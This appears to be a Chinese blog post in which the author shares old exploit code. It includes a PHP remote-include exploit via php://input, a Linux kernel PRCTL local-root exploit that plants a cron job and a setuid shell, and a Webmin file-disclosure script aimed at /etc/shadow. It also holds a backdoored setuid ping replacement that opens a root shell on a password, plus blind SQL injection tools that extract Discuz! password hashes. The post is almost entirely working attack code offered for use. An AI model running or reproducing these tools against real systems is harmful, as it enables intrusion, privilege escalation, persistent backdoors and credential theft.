翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意
Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:
<?php
/*
*
* PHP include file exploit
* Modified by wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
* Date: Jun 24th 2006
*
*/
function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
$server=isset($_POST['server'])?$_POST['server']:"";
$file=isset($_POST['file'])?$_POST['file']:"";
$iszero=isset($_POST['iszero'])?"checked":"";
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";
?>
<style>
body {font-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
font-family: "Verdana";
font-size: "10px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "2px solid #666666";
}
</style>
<center><b>PHP include file exploit</b><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0</font></center><br><br>
<form action="" method="post" >
target server : <br>
<input type="text" name="server" value="<?=$server?>"><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value="<?=$file?>"><br>
add "%00": <input type="checkbox" <?=$iszero?> name="iszero"><br><br>
exec (enclose php commands between <? .. ?> tags):<br>
<input type="text" name="cmd" value="<?= htmlspecialchars($cmd);?>" ><br><br>
<INPUT type="submit" value="send">
</form>
<?php
if(isset($_POST['cmd']))
{
$zerochar = $iszero == "checked"?"%00":"";
$message = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while(!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
echo $resp;
}
?>
这个是当时linux kernel PRCTL loacl poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)
/********************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* Modified by wofeiwo [13.Jul.2006] (chage shellcode) */
/*------------------------------------------------------*/
/* Based on: */
/*------------------------------------------------------*/
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/********************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root echo -e \"#include <stdio.h>\\nint main(){\\nsetuid(0);setgid(0);setreuid(0);system(\\\"/bin/sh\\\");return 0;\\n}\\n\" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("Last modified By: wofeiwo (chage shellcode)\n");
printf("Last edited: [ 13.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(63);
printf("[*] Running shell (remember to remove /tmp/fakesh when finished) 
\n");
system("/tmp/fakesh");
return 0;
}
python写的,去年webmin 一个高危漏洞的exp
#!/usr/bin/python
# Webmin - Usermin Arbitrary File Disclosure Exploit
# Write by wofeiwo
# Date: July 10 2006
import sys, urllib, os
def usage (name):
print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo <wofeiwo[0x40]gmail[dot]com>\n\nUsage: %s <target> <file>\nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)
def main ():
if len(sys.argv) != 3:
(filepath, filename) = os.path.split(sys.argv[0])
usage(filename)
sys.exit(-1)
else:
target = sys.argv[1] + "unauthenticated" + "/..%01"*61 + "/" + sys.argv[2]
sock = urllib.urlopen(target)
getfile = sock.read()
sock.close()
print getfile
if __name__ == "__main__": main()
n年前写的替换系统ping的后门,因为ping是有s位的:)
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#define PWD "wofeiwo"
/* init the daemon, if success return 0 other <0 */
int daemon_init()
{
struct sigaction act;
int i, maxfd;
if(fork() != 0) exit(0);
if(setsid() < 0) return(-1);
act.sa_handler = SIG_IGN;
/*act.sa_mask = 0;*/
act.sa_flags = 0;
sigaction(SIGHUP, &act, 0);
if(fork() != 0) exit(0);
chdir("/");
umask(0);
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; i<maxfd; i++)
close(i);
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}
int main(int argc, char *argv[])
{
int i,j=0;
char argv_execv[52][128];
char usage[]=
"Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
" [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
" [-M mtu discovery hint] [-S sndbuf]\n"
" [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";
if (argc == 1) printf("%s", usage);
if (argc > 1)
{
if (strcmp(PWD, argv[1]) == 0)
{
signal(SIGCHLD, sig_chid);
daemon_init();
seteuid(0);
setuid(0);
setgid(0);
system("/bin/bash");
return 1;
}
else
{
for (i = argc; i > 0; i--)
{
strcpy(argv_execv[j],argv[j]);
j++;
}
strcpy(argv_execv[j], "\0");
execv("/bin/ping", argv);
return 1;
}
}
return 0;
}
最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的
/*
*
* Discuz! 5.0.0 RC1 SQL injection PoC
* Author: wofeiwo thx superheis help
* Date: Aug 24th 2006
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#define PASSLEN 32
char *HMod[] = { "GET","POST"};
char *HttpVer[] = { "HTTP/1.0", "HTTP/1.1"};
char *HAccept[] = { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"};
char *HAcceptLg[] = { "Accept-Language:"," zh-cn"};
char *HContentTp[]= { "Content-Type:"," application/x-www-form-urlencoded"};
char *HAcceptEn[] = { "Accept-Encoding:"," gzip, deflate"};
char *HUserAgent[]= { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char *HReferer[]= { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char *HHost[]= { "Host: "};
char *HContentLg[]= { "Content-Length:"," 189"};
char *HContion[]= { "Connection:"," Keep-Alive"};
char *HCacheCtr[]= { "Cache-Control:"," no-cache"};
char *HXForwardedFor[]= { "X-Forwarded-For:"};
char *HCookie[]= { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char *HPost[]= { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };
char query[] = " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[128];
char temp1[1024],temp2[10240] = {0};
int sanddata(char *host, int port, char *path, char *uid, int ascii, int chrnum)
{
WSADATA WSAData={0};
struct hostent *he;
struct sockaddr_in ServerAddr={0};
SOCKET Socket=0;
int ren = 0;
char *p = NULL;
if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;
if((he = gethostbyname(host)) == 0)
{
fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
exit(-1);
}
Socket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_addr = *((struct in_addr *)he->h_addr);
ServerAddr.sin_port = htons(port);
memset(temp1,0,1024);
sprintf(querystring, query, uid, chrnum, ascii);
sprintf(temp1, "%s %s%s %s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"%s%s\r\n"
"\r\n"
"%s\r\n"
"\r\n\r\n"
,
HMod[1],path,"logging.php?action=login",HttpVer[1],
HAccept[0],HAccept[1],
HAcceptLg[0],HAcceptLg[1],
HContentTp[0],HContentTp[1],
HAcceptEn[0],HAcceptEn[1],
HUserAgent[0],HUserAgent[1],
HReferer[0],HReferer[1],
HHost[0],host,
HContentLg[0]," 0",
HContion[0],HContion[1],
HCacheCtr[0],HCacheCtr[1],
HXForwardedFor[0],querystring,
HCookie[0],HCookie[1],
HPost[0]
);
if (chrnum == 1) printf("\r\n%s\r\n",temp1);
connect(Socket,(SOCKADDR *)&ServerAddr,sizeof(ServerAddr));
send(Socket,temp1,strlen(temp1),0);
//sleep(1);
while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}
if (chrnum == 1) printf("\r\n%s\r\n",temp2);
if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
{
fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
exit(1);
}
if((p = strstr(temp2, "ip3")) == NULL)
{
close(Socket);
return ascii;
}
close(Socket);
return 0;
}
int main(int argc,char *argv[])
{
int i = 0,j = 0,ret = 0;
fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");
if(argc != 5)
{
fprintf(stderr, "Usage: %s <host> <port> <path> <uid>\r\n", argv[0]);
fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
exit(1);
}
fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
fprintf(stdout, "[+] Trying ..\r\n");
fprintf(stdout, "[+] Plz wait a monment ..\r\n");
fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);
for(j = 1; j <= PASSLEN; j++)
{
for(i = 48; i < 58; i++)
{
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
else
{
fprintf(stdout, "%c", ret);
goto finded;
}
}
for(i = 98; i < 123; i++)
{
if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
else
{
fprintf(stdout, "%c", ret);
goto finded;
}
}
finded: ret = 0;
}
fprintf(stdout, "\r\n");
fprintf(stdout, "[+] Finished\r\n");
return 0;
}
#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Date: Aug 13th 2006
import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep
password = {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}
class creatthread (threading.Thread):
def __init__ (self, threadname, url, u):
self.realurl = url
self.realu = u
threading.Thread.__init__(self, name = threadname)
def run (self):
lenth = 32
injection(lenth, self.realurl, self.realu, self.getName())
def injection (lenthofpass, realurl, path, num):
ran = range(97, 123)
for a in range(48, 58): ran.append(a)
for i in ran:
query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /*'
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST", path + "logging.php?action=login&",data , header)
sleep(1)
response = http.getresponse()
re1 = response.read()
if re1.find('SELECT') == -1:
print '[-] Unvalnerable host'
print '[-] Exit..'
sys.exit(1);
elif re1.find('ip3') == -1:
password[int(num)] = chr(i)
#print '[+] password ' + num + ': ' + chr(i)
http.close()
sleep(1)
break
#print re1
#print '-----------------------------------------------'
http.close()
sleep(1)
def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'
if len(sys.argv) == 3:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2]
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)
print '[+] Connect %s' % url[1]
print '[+] Begin threads'
print '[+] Plz wait a long long time'
for a in range(1,33) :
thread = creatthread(str(a), url, u)
thread.start()
while threading.activeCount() != 1:
continue
else:
sys.stdout.write( '[+] The uid=' + sys.argv[2] + ' password hash is: ' )
for n in range(1, 33) :
sys.stdout.write(password[n])
sys.stdout.write('\n[+] Finished \n')
if __name__ == '__main__': main()